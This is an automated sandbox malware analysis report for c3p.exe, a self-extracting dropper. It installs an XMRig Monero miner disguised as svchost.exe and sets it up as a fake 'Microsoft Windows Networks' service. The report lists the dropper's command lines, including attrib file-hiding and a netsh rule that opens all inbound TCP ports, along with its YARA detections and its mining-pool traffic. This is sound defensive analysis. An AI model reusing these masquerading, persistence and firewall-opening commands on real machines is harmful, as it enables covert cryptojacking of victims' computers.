Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
c3p.exe

Overview

General Information

Sample name:c3p.exe
Analysis ID:1456175
MD5:02aa02aee2a6bd93a4a8f4941a0e6310
SHA1:03287a15bfd67ff8c3340c0bae425ecaa37a929f
SHA256:01a976b80253450a09d0b89075f5fa923a3411265f7bc8f3413d059fd662aa83
Tags:CoinMinerexeminer
Infos:

Detection

Xmrig
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected Xmrig cryptocurrency miner
Drops PE files with benign system names
Drops executables to the windows directory (C:\Windows) and starts them
Found strings related to Crypto-Mining
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies the windows firewall
Query firmware table information (likely to detect VMs)
Sample is not signed and drops a device driver
Sigma detected: Execution from Suspicious Folder
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Suspect Svchost Activity
Sigma detected: System File Execution Location Anomaly
Uses cmd line tools excessively to alter registry or file data
Uses netsh to modify the Windows network and firewall settings
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to delete services
Contains functionality to dynamically determine API calls
Contains functionality to enumerate running services
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Creates files inside the system directory
Creates or modifies windows services
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
File is packed with WinRar
Found dropped PE file which has not been started or loaded
Found evaded block containing many API calls
Found evasive API chain (date check)
Found evasive API chain (may stop execution after checking a module file name)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Modifies existing windows services
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Conhost Spawned By Uncommon Parent Process
Sigma detected: Suspicious Process Start Locations
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • svchost.exe (PID: 5880 cmdline: C:\Windows\system32\svchost.exe -k LocalService -s W32Time MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • c3p.exe (PID: 4912 cmdline: "C:\Users\user\Desktop\c3p.exe" MD5: 02AA02AEE2A6BD93A4A8F4941A0E6310)
    • cmd.exe (PID: 7224 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Windows\debug\c3p\cmd.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7232 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • svchost.exe (PID: 7276 cmdline: C:\WINDOWS\Debug\c3p\svchost.exe install "Networks2" C:\WINDOWS\Debug\c3p\systems.exe MD5: D9EC6F3A3B2AC7CD5EEF07BD86E3EFBC)
      • sc.exe (PID: 7292 cmdline: sc config "Networks2" DisplayName= "Networksrs2" MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8)
      • sc.exe (PID: 7308 cmdline: sc description "Networks2" "Microsoft Windows Networks" MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8)
      • sc.exe (PID: 7324 cmdline: sc start "Networks2" MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8)
      • attrib.exe (PID: 7364 cmdline: attrib C:\Windows\debug\c3p +h +a MD5: 0E938DD280E83B1596EC6AA48729C2B0)
      • attrib.exe (PID: 7380 cmdline: attrib C:\Windows\debug\c3p\*.json +h +a +s +r MD5: 0E938DD280E83B1596EC6AA48729C2B0)
      • attrib.exe (PID: 7396 cmdline: attrib C:\Windows\debug\c3p\*.exe +h +a +s +r MD5: 0E938DD280E83B1596EC6AA48729C2B0)
      • netsh.exe (PID: 7412 cmdline: netsh advfirewall firewall add rule name="tcp all" dir=in protocol=tcp localport=0-65535 action=allow MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
  • svchost.exe (PID: 7340 cmdline: C:\WINDOWS\Debug\c3p\svchost.exe MD5: D9EC6F3A3B2AC7CD5EEF07BD86E3EFBC)
    • conhost.exe (PID: 7460 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • systems.exe (PID: 7504 cmdline: "C:\WINDOWS\Debug\c3p\systems.exe" MD5: E2FE87CC2C7DAB8CA6516620DCCD1381)
  • svchost.exe (PID: 7840 cmdline: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
xmrigAccording to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig
No configs have been found
SourceRuleDescriptionAuthorStrings
C:\Windows\debug\c3p\systems.exeJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
    C:\Windows\debug\c3p\systems.exeLinux_Trojan_Pornoasset_927f314funknownunknown
    • 0x1356d8:$a: C3 D3 CB D3 C3 48 31 C3 48 0F AF F0 48 0F AF F0 48 0F AF F0 48
    C:\Windows\debug\c3p\systems.exeMacOS_Cryptominer_Xmrig_241780a1unknownunknown
    • 0x612109:$a1: mining.set_target
    • 0x603d4a:$a2: XMRIG_HOSTNAME
    • 0x6069d8:$a3: Usage: xmrig [OPTIONS]
    • 0x603d24:$a4: XMRIG_VERSION
    C:\Windows\debug\c3p\systems.exeMAL_XMR_Miner_May19_1Detects Monero Crypto Coin MinerFlorian Roth
    • 0x65b8fe:$x1: donate.ssl.xmrig.com
    • 0x65bdd9:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
    • 0x6ecf53:$s2: \\?\pipe\uv\%p-%lu
    C:\Windows\debug\c3p\systems.exeMALWARE_Win_CoinMiner02Detects coinmining malwareditekSHen
    • 0x65cf88:$s1: %s/%s (Windows NT %lu.%lu
    • 0x6616e8:$s3: \\.\WinRing0_
    • 0x608b02:$s4: pool_wallet
    • 0x603170:$s5: cryptonight
    • 0x60317e:$s5: cryptonight
    • 0x60318d:$s5: cryptonight
    • 0x60319b:$s5: cryptonight
    • 0x6031b0:$s5: cryptonight
    • 0x6031bf:$s5: cryptonight
    • 0x6031cd:$s5: cryptonight
    • 0x6031e2:$s5: cryptonight
    • 0x6031f1:$s5: cryptonight
    • 0x603202:$s5: cryptonight
    • 0x603219:$s5: cryptonight
    • 0x603227:$s5: cryptonight
    • 0x603235:$s5: cryptonight
    • 0x603245:$s5: cryptonight
    • 0x603257:$s5: cryptonight
    • 0x603268:$s5: cryptonight
    • 0x603278:$s5: cryptonight
    • 0x603288:$s5: cryptonight
    SourceRuleDescriptionAuthorStrings
    0000000F.00000002.2581832116.000001A465C15000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
      0000000F.00000002.2583101725.00007FF707684000.00000008.00000001.01000000.00000008.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
        00000002.00000003.1341556755.0000000002A33000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
          0000000F.00000000.1358907279.00007FF707684000.00000008.00000001.01000000.00000008.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
            00000002.00000003.1341556755.00000000028A6000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
              Click to see the 11 entries
              SourceRuleDescriptionAuthorStrings
              15.0.systems.exe.7ff706b90000.0.unpackJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
                15.0.systems.exe.7ff706b90000.0.unpackLinux_Trojan_Pornoasset_927f314funknownunknown
                • 0x1356d8:$a: C3 D3 CB D3 C3 48 31 C3 48 0F AF F0 48 0F AF F0 48 0F AF F0 48
                15.0.systems.exe.7ff706b90000.0.unpackMacOS_Cryptominer_Xmrig_241780a1unknownunknown
                • 0x612109:$a1: mining.set_target
                • 0x603d4a:$a2: XMRIG_HOSTNAME
                • 0x6069d8:$a3: Usage: xmrig [OPTIONS]
                • 0x603d24:$a4: XMRIG_VERSION
                15.0.systems.exe.7ff706b90000.0.unpackMAL_XMR_Miner_May19_1Detects Monero Crypto Coin MinerFlorian Roth
                • 0x65b8fe:$x1: donate.ssl.xmrig.com
                • 0x65bdd9:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
                • 0x6ecf53:$s2: \\?\pipe\uv\%p-%lu
                15.0.systems.exe.7ff706b90000.0.unpackMALWARE_Win_CoinMiner02Detects coinmining malwareditekSHen
                • 0x65cf88:$s1: %s/%s (Windows NT %lu.%lu
                • 0x6616e8:$s3: \\.\WinRing0_
                • 0x608b02:$s4: pool_wallet
                • 0x603170:$s5: cryptonight
                • 0x60317e:$s5: cryptonight
                • 0x60318d:$s5: cryptonight
                • 0x60319b:$s5: cryptonight
                • 0x6031b0:$s5: cryptonight
                • 0x6031bf:$s5: cryptonight
                • 0x6031cd:$s5: cryptonight
                • 0x6031e2:$s5: cryptonight
                • 0x6031f1:$s5: cryptonight
                • 0x603202:$s5: cryptonight
                • 0x603219:$s5: cryptonight
                • 0x603227:$s5: cryptonight
                • 0x603235:$s5: cryptonight
                • 0x603245:$s5: cryptonight
                • 0x603257:$s5: cryptonight
                • 0x603268:$s5: cryptonight
                • 0x603278:$s5: cryptonight
                • 0x603288:$s5: cryptonight
                Click to see the 5 entries

                System Summary

                barindex
                Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: C:\WINDOWS\Debug\c3p\svchost.exe install "Networks2" C:\WINDOWS\Debug\c3p\systems.exe, CommandLine: C:\WINDOWS\Debug\c3p\svchost.exe install "Networks2" C:\WINDOWS\Debug\c3p\systems.exe, CommandLine|base64offset|contains: {-jY, Image: C:\Windows\debug\c3p\svchost.exe, NewProcessName: C:\Windows\debug\c3p\svchost.exe, OriginalFileName: C:\Windows\debug\c3p\svchost.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Windows\debug\c3p\cmd.bat" ", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7224, ParentProcessName: cmd.exe, ProcessCommandLine: C:\WINDOWS\Debug\c3p\svchost.exe install "Networks2" C:\WINDOWS\Debug\c3p\systems.exe, ProcessId: 7276, ProcessName: svchost.exe
                Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\c3p.exe, ProcessId: 4912, TargetFilename: C:\Windows\debug\c3p\svchost.exe
                Source: Process startedAuthor: David Burkett, @signalblur: Data: Command: C:\WINDOWS\Debug\c3p\svchost.exe, CommandLine: C:\WINDOWS\Debug\c3p\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\debug\c3p\svchost.exe, NewProcessName: C:\Windows\debug\c3p\svchost.exe, OriginalFileName: C:\Windows\debug\c3p\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 624, ProcessCommandLine: C:\WINDOWS\Debug\c3p\svchost.exe, ProcessId: 7340, ProcessName: svchost.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: C:\WINDOWS\Debug\c3p\svchost.exe install "Networks2" C:\WINDOWS\Debug\c3p\systems.exe, CommandLine: C:\WINDOWS\Debug\c3p\svchost.exe install "Networks2" C:\WINDOWS\Debug\c3p\systems.exe, CommandLine|base64offset|contains: {-jY, Image: C:\Windows\debug\c3p\svchost.exe, NewProcessName: C:\Windows\debug\c3p\svchost.exe, OriginalFileName: C:\Windows\debug\c3p\svchost.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Windows\debug\c3p\cmd.bat" ", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7224, ParentProcessName: cmd.exe, ProcessCommandLine: C:\WINDOWS\Debug\c3p\svchost.exe install "Networks2" C:\WINDOWS\Debug\c3p\systems.exe, ProcessId: 7276, ProcessName: svchost.exe
                Source: Process startedAuthor: Tim Rauch: Data: Command: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, CommandLine: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, CommandLine|base64offset|contains: }}, Image: C:\Windows\System32\conhost.exe, NewProcessName: C:\Windows\System32\conhost.exe, OriginalFileName: C:\Windows\System32\conhost.exe, ParentCommandLine: C:\WINDOWS\Debug\c3p\svchost.exe, ParentImage: C:\Windows\debug\c3p\svchost.exe, ParentProcessId: 7340, ParentProcessName: svchost.exe, ProcessCommandLine: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, ProcessId: 7460, ProcessName: conhost.exe
                Source: Process startedAuthor: juju4, Jonhnathan Ribeiro, oscd.community: Data: Command: C:\WINDOWS\Debug\c3p\svchost.exe install "Networks2" C:\WINDOWS\Debug\c3p\systems.exe, CommandLine: C:\WINDOWS\Debug\c3p\svchost.exe install "Networks2" C:\WINDOWS\Debug\c3p\systems.exe, CommandLine|base64offset|contains: {-jY, Image: C:\Windows\debug\c3p\svchost.exe, NewProcessName: C:\Windows\debug\c3p\svchost.exe, OriginalFileName: C:\Windows\debug\c3p\svchost.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Windows\debug\c3p\cmd.bat" ", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7224, ParentProcessName: cmd.exe, ProcessCommandLine: C:\WINDOWS\Debug\c3p\svchost.exe install "Networks2" C:\WINDOWS\Debug\c3p\systems.exe, ProcessId: 7276, ProcessName: svchost.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\WINDOWS\Debug\c3p\svchost.exe install "Networks2" C:\WINDOWS\Debug\c3p\systems.exe, CommandLine: C:\WINDOWS\Debug\c3p\svchost.exe install "Networks2" C:\WINDOWS\Debug\c3p\systems.exe, CommandLine|base64offset|contains: {-jY, Image: C:\Windows\debug\c3p\svchost.exe, NewProcessName: C:\Windows\debug\c3p\svchost.exe, OriginalFileName: C:\Windows\debug\c3p\svchost.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Windows\debug\c3p\cmd.bat" ", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7224, ParentProcessName: cmd.exe, ProcessCommandLine: C:\WINDOWS\Debug\c3p\svchost.exe install "Networks2" C:\WINDOWS\Debug\c3p\systems.exe, ProcessId: 7276, ProcessName: svchost.exe
                Source: Process startedAuthor: vburov: Data: Command: C:\Windows\system32\svchost.exe -k LocalService -s W32Time, CommandLine: C:\Windows\system32\svchost.exe -k LocalService -s W32Time, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 624, ProcessCommandLine: C:\Windows\system32\svchost.exe -k LocalService -s W32Time, ProcessId: 5880, ProcessName: svchost.exe
                No Snort rule has matched

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: C:\Windows\debug\c3p\systems.exeAvira: detection malicious, Label: PUA/CoinMiner.bencb
                Source: C:\Windows\debug\c3p\systems.exeReversingLabs: Detection: 86%
                Source: c3p.exeReversingLabs: Detection: 68%
                Source: C:\Windows\debug\c3p\systems.exeJoe Sandbox ML: detected
                Source: c3p.exeJoe Sandbox ML: detected

                Bitcoin Miner

                barindex
                Source: Yara matchFile source: 15.0.systems.exe.7ff706b90000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 15.2.systems.exe.7ff706b90000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000F.00000002.2581832116.000001A465C15000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.2583101725.00007FF707684000.00000008.00000001.01000000.00000008.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000003.1341556755.0000000002A33000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000000.1358907279.00007FF707684000.00000008.00000001.01000000.00000008.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000003.1341556755.00000000028A6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000000.1358706937.00007FF707193000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.2582766693.00007FF707193000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: c3p.exe PID: 4912, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: systems.exe PID: 7504, type: MEMORYSTR
                Source: Yara matchFile source: C:\Windows\debug\c3p\systems.exe, type: DROPPED
                Source: c3p.exe, 00000002.00000003.1341556755.00000000028A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: stratum+ssl://randomx.xmrig.com:443
                Source: c3p.exe, 00000002.00000003.1341556755.00000000028A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: cryptonight/0
                Source: c3p.exe, 00000002.00000003.1341556755.00000000028A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: -o, --url=URL URL of mining server
                Source: c3p.exe, 00000002.00000003.1341556755.00000000028A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: stratum+tcp://
                Source: c3p.exe, 00000002.00000003.1341556755.00000000028A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Usage: xmrig [OPTIONS]
                Source: c3p.exe, 00000002.00000003.1341556755.0000000002A33000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: FileDescriptionXMRig miner.
                Source: c3p.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: Binary string: d:\Projects\WinRAR\SFX\build\sfxrar32\Release\sfxrar.pdb source: c3p.exe
                Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: c3p.exe, 00000002.00000003.1341556755.00000000026A4000.00000004.00000020.00020000.00000000.sdmp, WinRing0x64.sys.2.dr
                Source: C:\Users\user\Desktop\c3p.exeCode function: 2_2_004091FE FindFirstFileW,FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,2_2_004091FE
                Source: C:\Users\user\Desktop\c3p.exeCode function: 2_2_0040DB4F SendDlgItemMessageW,DestroyIcon,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SetDlgItemTextW,SHGetFileInfoW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,2_2_0040DB4F
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficDNS traffic detected: DNS query: time.windows.com
                Source: global trafficDNS traffic detected: DNS query: auto.c3pool.org
                Source: c3p.exe, 00000002.00000003.1341556755.00000000026A4000.00000004.00000020.00020000.00000000.sdmp, WinRing0x64.sys.2.drString found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
                Source: c3p.exe, 00000002.00000003.1341556755.00000000026A4000.00000004.00000020.00020000.00000000.sdmp, WinRing0x64.sys.2.drString found in binary or memory: http://crl.globalsign.net/Root.crl0
                Source: c3p.exe, 00000002.00000003.1341556755.00000000026A4000.00000004.00000020.00020000.00000000.sdmp, WinRing0x64.sys.2.drString found in binary or memory: http://crl.globalsign.net/RootSignPartners.crl0
                Source: c3p.exe, 00000002.00000003.1341556755.00000000026A4000.00000004.00000020.00020000.00000000.sdmp, WinRing0x64.sys.2.drString found in binary or memory: http://crl.globalsign.net/primobject.crl0
                Source: svchost.exe, 00000005.00000000.1347222716.0000000000426000.00000002.00000001.01000000.00000007.sdmp, svchost.exe, 00000009.00000000.1351325044.0000000000426000.00000002.00000001.01000000.00000007.sdmp, svchost.exe.2.drString found in binary or memory: http://nssm.cc/h
                Source: c3p.exe, 00000002.00000003.1341556755.00000000028A6000.00000004.00000020.00020000.00000000.sdmp, systems.exe, 0000000F.00000002.2582766693.00007FF707193000.00000002.00000001.01000000.00000008.sdmp, systems.exe.2.drString found in binary or memory: https://xmrig.com/benchmark/%s
                Source: c3p.exe, 00000002.00000003.1341556755.00000000028A6000.00000004.00000020.00020000.00000000.sdmp, systems.exe, systems.exe, 0000000F.00000002.2582766693.00007FF707193000.00000002.00000001.01000000.00000008.sdmp, systems.exe.2.drString found in binary or memory: https://xmrig.com/docs/algorithms
                Source: systems.exe, systems.exe, 0000000F.00000002.2582766693.00007FF707193000.00000002.00000001.01000000.00000008.sdmp, systems.exe.2.drString found in binary or memory: https://xmrig.com/wizard
                Source: systems.exe, 0000000F.00000002.2582766693.00007FF707193000.00000002.00000001.01000000.00000008.sdmp, systems.exe.2.drString found in binary or memory: https://xmrig.com/wizard%s
                Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
                Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
                Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
                Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
                Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
                Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
                Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443

                System Summary

                barindex
                Source: 15.0.systems.exe.7ff706b90000.0.unpack, type: UNPACKEDPEMatched rule: Linux_Trojan_Pornoasset_927f314f Author: unknown
                Source: 15.0.systems.exe.7ff706b90000.0.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                Source: 15.0.systems.exe.7ff706b90000.0.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                Source: 15.0.systems.exe.7ff706b90000.0.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
                Source: 15.2.systems.exe.7ff706b90000.0.unpack, type: UNPACKEDPEMatched rule: Linux_Trojan_Pornoasset_927f314f Author: unknown
                Source: 15.2.systems.exe.7ff706b90000.0.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                Source: 15.2.systems.exe.7ff706b90000.0.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                Source: 15.2.systems.exe.7ff706b90000.0.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
                Source: 00000002.00000003.1341556755.00000000028A6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                Source: 0000000F.00000000.1358706937.00007FF707193000.00000002.00000001.01000000.00000008.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                Source: 0000000F.00000002.2582766693.00007FF707193000.00000002.00000001.01000000.00000008.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                Source: 0000000F.00000000.1357815445.00007FF706B91000.00000020.00000001.01000000.00000008.sdmp, type: MEMORYMatched rule: Linux_Trojan_Pornoasset_927f314f Author: unknown
                Source: 0000000F.00000002.2582096108.00007FF706B91000.00000020.00000001.01000000.00000008.sdmp, type: MEMORYMatched rule: Linux_Trojan_Pornoasset_927f314f Author: unknown
                Source: Process Memory Space: c3p.exe PID: 4912, type: MEMORYSTRMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                Source: Process Memory Space: systems.exe PID: 7504, type: MEMORYSTRMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                Source: C:\Windows\debug\c3p\systems.exe, type: DROPPEDMatched rule: Linux_Trojan_Pornoasset_927f314f Author: unknown
                Source: C:\Windows\debug\c3p\systems.exe, type: DROPPEDMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                Source: C:\Windows\debug\c3p\systems.exe, type: DROPPEDMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                Source: C:\Windows\debug\c3p\systems.exe, type: DROPPEDMatched rule: Detects coinmining malware Author: ditekSHen
                Source: C:\Users\user\Desktop\c3p.exeCode function: 2_2_00406733: __EH_prolog,CreateFileW,CloseHandle,_wcslen,CreateDirectoryW,_wcscpy,_wcslen,_wcscpy,_wcscpy,_wcscpy,_wcscpy,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,2_2_00406733
                Source: C:\Windows\debug\c3p\svchost.exeCode function: 5_2_0040FA10 GetModuleFileNameW,CreateServiceW,GetLastError,CloseServiceHandle,DeleteService,CloseServiceHandle,CloseServiceHandle,5_2_0040FA10
                Source: C:\Users\user\Desktop\c3p.exeFile created: C:\Windows\debug\c3p\WinRing0x64.sysJump to behavior
                Source: C:\Users\user\Desktop\c3p.exeFile created: C:\Windows\debug\c3pJump to behavior
                Source: C:\Users\user\Desktop\c3p.exeFile created: C:\Windows\debug\c3p\__tmp_rar_sfx_access_check_6055437Jump to behavior
                Source: C:\Users\user\Desktop\c3p.exeFile created: C:\Windows\debug\c3p\cmd.batJump to behavior
                Source: C:\Users\user\Desktop\c3p.exeFile created: C:\Windows\debug\c3p\config.jsonJump to behavior
                Source: C:\Users\user\Desktop\c3p.exeFile created: C:\Windows\debug\c3p\SHA256SUMSJump to behavior
                Source: C:\Users\user\Desktop\c3p.exeFile created: C:\Windows\debug\c3p\svchost.exeJump to behavior
                Source: C:\Users\user\Desktop\c3p.exeFile created: C:\Windows\debug\c3p\systems.exeJump to behavior
